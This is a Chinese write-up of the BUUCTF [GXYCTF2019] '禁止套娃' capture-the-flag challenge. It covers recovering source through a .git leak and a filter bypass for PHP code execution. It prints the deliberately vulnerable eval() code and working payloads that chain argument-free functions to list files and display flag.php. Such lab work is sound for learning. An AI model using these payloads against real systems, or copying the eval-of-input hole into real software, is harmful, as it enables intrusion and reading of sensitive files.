web buuctf [GXYCTF2019]禁止套娃1
考点:1.git泄露2.无参RCE1.用御剑扫后台没扫到啥东西看robots.txt文本,也没有2.都这样了,考虑一下有没有可能存在.git泄露,(我装了两个版本的python,githack需要在python2下运行)index.php源码如下<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp']))
考点:1.git泄露
2.无参RCE
1.用御剑扫后台没扫到啥东西
看robots.txt文本,也没有
2.都这样了,考虑一下有没有可能存在.git泄露,
(我装了两个版本的python,githack需要在python2下运行)
index.php源码如下
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp']))
过滤了伪协议
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']))
过滤了很多字符,像get啥的都不能用了
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
这段代码的核心就是只允许函数而不允许函数中的参数,就是说传进去的值是一个字符串接一个
()
,那么这个字符串就会被替换为空,如果替换后只剩下;
,那么这个条件就成立。+:量词:匹配1到无穷次,尽可能多匹配,如果有必要,回溯匹配更少内容(贪婪)
(?R)?递归引用整个表达式 后面的?是量词,匹配0个到1个,尽可能多匹配如果有必要,回溯更少的内容(贪婪)
举例:像
a(b(c()));
第一次匹配后就还剩下a(b());
,第二次匹配后就还剩a();
,第三次匹配后就还剩;
了,所以说这一串a(b(c())),
就会被eval
执行,但相反,像a(b('111'));
这种存在参数的就不行,因为无论正则匹配多少次它的参数总是存在的。那假如遇到这种情况,我们就只能使用没有参数的php函数,
我们开始构造payload
需要先查看一下当前的目录情况
scandir(current(localecnov()))
localecnov() 函数返回一个包含本地数字及货币格式信息的数组。相当于Linux的ls。(我上面放的链接也简单说了一下这个函数)。
scandir()就是列出目录中的文件和目录.
current() 返回数组中当前元素的值
我们还需要把他打印出来,所以
payload: exp=print_r(scandir(current(localeconv())));
使用反转数组函数:array_reverse()。再让指针指向下一个数组元素(第二个)next()
exp=print_r(next(array_reverse(scandir(current(localeconv())))));
根据源码提示,使用高亮函数(highlight_file()当使用该函数时,整个文件都将被显示,包括密码和其他敏感信息!)
highlight_file(next(array_reverse(scandir(current(localeconv())))));
得到flag{c69be6ff-89a9-43fd-a5c4-b2af68bdd1fe}
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
所有评论(0)